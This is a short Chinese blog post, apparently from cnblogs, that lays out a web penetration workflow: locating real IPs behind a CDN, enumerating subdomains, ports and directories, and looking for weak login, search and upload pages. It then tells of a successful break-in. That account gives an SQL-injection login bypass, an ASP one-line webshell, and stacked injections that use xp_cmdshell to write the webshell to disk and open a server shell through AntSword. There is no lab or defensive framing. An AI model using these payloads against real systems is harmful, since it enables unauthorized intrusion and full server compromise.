• 渗透过程


    信息收集

    1.IP信息

    17CE

    看是否存在cdn

    存在的话,查找真实ip

    • 从国外去访问,查看ip信息
    • 去掉www,然后查看ip信息

    2.旁站信息

    • webscan.cc

    • 站长之家

    3.C段信息

    • webscan.cc

    • 站长之家

    4.子域名信息

    • layer子域名挖掘机
    • subdomain

    5.端口信息

    • nmap
    • portscan

    6.网站目录信息

    • dirsearch
    • dirb

    目的是扩大攻击面,寻找防护薄弱点和可利用信息

    寻找可能存在漏洞的地方

    • 登陆界面 可能存在sql注入,可以先使用admin' or 1=1 --+ 之类的语句尝试绕过

    • 搜索界面 可能存在sql注入和存储型和DOM型xss等

    • 上传界面 可以上传一些木马之类东西:

      eg:上传一句话木马,然后使用中国蚁剑去连接(中国菜刀没有中国蚁剑好用!!)

    • 涉及密码或者其它敏感信息的地方 可以进行抓包分析,查看请求包和响应包,看一下有没有什么可以利用的信息,或者有可以修改的参数之类的东西,如果有进行修改,理解每个参数的意义和变化

    一次成功的经验

    收集信息发现子域名信息,找到一个可以利用的ip,进行端口扫描和网站目录爆破,发现后台管理界面,尝试万能密码进行绕过,成功,里面没有什么可以利用的信息,然后寻找上传接口,然后发现可以从登陆界面上传文件,

    一句话木马:

    <%execute(request("kxc"))%>
    

    mysql开启存储过程

    exec master..xp_cmdshell
    

    echo中使用^转义特殊字符

    ss' ;exec master..xp_cmdshell "echo dfvdf > D:\KEFU\a.asp"; --+
    

    定义一个变量,然后将变量输入到文件中

    sa';declare @cmd sysname set @cmd = 'echo ^<^%execute^(request^("kxc"^)^)^%^> > D:KEFU1.asp' exec master..xp_cmdshell @cmd;--+
    

    然后使用中国蚁剑连接,可以获得服务器shell


    参考链接

    参考

  • 相关阅读:
    [刘阳Java]_JdbcTemplate用法_第11讲
    [刘阳Java]_Spring对Dao的支持_第10讲
    [刘阳Java]_Spring AOP基于XML配置介绍_第9讲
    [刘阳Java]_Spring AOP注解详细介绍_第8讲
    [刘阳Java]_Spring AOP入门_第7讲
    [刘阳Java]_Spring常用注解介绍_第6讲
    [刘阳Java]_Spring相关配置介绍_第5讲
    [刘阳Java]_了解BeanFactory_第4讲
    vue传参
    axios的增删改查。
  • 原文地址:https://www.cnblogs.com/tomyyyyy/p/11178557.html
Copyright © 2020-2023  润新知